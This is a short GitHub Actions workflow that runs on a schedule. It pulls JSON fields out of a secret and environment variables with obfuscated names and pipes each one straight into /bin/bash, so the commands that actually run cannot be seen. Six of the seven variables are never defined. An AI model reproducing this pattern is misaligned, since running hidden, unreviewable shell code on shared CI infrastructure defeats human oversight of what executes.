name: hugouhuolong
on:
  workflow_dispatch:
  schedule:
    - cron: '30 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: hugouhuolong
        env:
          lr34: ${{ secrets.lr34 }}
        run: |
          echo $lr34 | jq -r .vhgcc69 | /bin/bash
          echo $vq422 | jq -r .xyjz4 | /bin/bash
          echo $cy5 | jq -r .h8 | /bin/bash
          echo $m875 | jq -r .eptm01600 | /bin/bash
          echo $ch1470 | jq -r .e497 | /bin/bash
          echo $qrhsp79 | jq -r .e92609 | /bin/bash
          echo $tcw37 | jq -r .gw67675 | /bin/bash

